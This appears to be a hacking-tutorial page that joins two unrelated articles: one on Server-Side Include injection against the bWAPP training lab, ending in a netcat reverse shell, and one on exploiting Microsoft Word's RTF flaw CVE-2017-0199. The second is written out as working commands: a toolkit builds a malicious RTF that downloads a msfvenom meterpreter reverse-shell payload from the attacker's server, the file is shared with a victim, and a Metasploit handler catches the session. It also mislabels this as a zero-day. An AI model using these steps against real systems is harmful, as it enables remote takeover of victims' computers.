Server Side Injection Explotation in bWapp

In this article you will learn how to exploit any server using server side include injection which is commonly known as SSI.

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. 

For more information visit owasp.org

 Let’s begin

In your kali Linux open the target IP in browser: 192.168.1.103/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select server side include injection now and click on hack.

Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.

Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on lookup tab. Here first name text filed is vulnerable to SSI injection.

when I clicked on lookup, a new wep page pop up on the window screen which was showning the IP 192.168.1.107 of my Kali Linux.

Now I will try to exploit this vulnerability by sending different types of malicious code into web application.  If you will see following screenshot carefully here I had sent a script which will generate an alert prompt in window screen. To perform this you need to modify text field of first name and type following code inside it.

So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulneable.

Similarly I had executed following code which will return current date and time.

So in this way this directive will display the content of http environment variable and from screenshot you can read he highlighted day, date and time.

If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.

Now again an alert prompt will pop up with server’s cookie, which we can use for further exploitation.

Using exec directive we can execute a server side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using following code.

Wonderful!!  So you can see without making proper compromise to the server we have got all present directories inside it.

Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.

So when again you will click on lookup tab you will get reverse connection through netcat shell  as I have received in following image which means the web application server is hacked where we can execute following command to penetrate more and more.

Id

pwd

Exploit Windows 10 PC with Microsoft RTF File (CVE-2017-0199)

Microsoft word is vulnerable against malicious RTF file, in this article we had made a zero day attack on MS- word 2013 using python script which will generate a malicious .rtf file and give meterpreter session of targeted system.

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.

Let’s start!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007 - 2013)

Open the terminal inside your kali Linux and type following to down this script.

Git clone https://github.com/bhdresh/CVE-2017-0199.git

 

Cd CVE-2017-0199

python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc

This command will run a python script to generate a rich text format payload where –M is used for generating rtf file –w is used for name of rtf file i.e. “sales.rtf” and –u for attacker’s IP address or domain name. 

As you can figure out in the given screenshot that above command has generated a malicious sales .rtf file, now before we send this file to our victim we need to connect it with any backdoor file so that we can establish reverse connect with victim.

On a new terminal use msfvenom to prepare an exe payload for attack and type following.

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 –f exe > /root/Desktop/raj.exe

Now move raj.exe into /var/www/html.

 

Now type following command where it will merge raj.exe with sales.rtf. Then you have to share the updated rtf file with victim and start multi handler simultaneously for reverse connection of victims.

python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe

When victim will open sales file which will be in doc format in that mean time attacker will receive his meterpreter ssession inside metasploite framework.

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.24

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo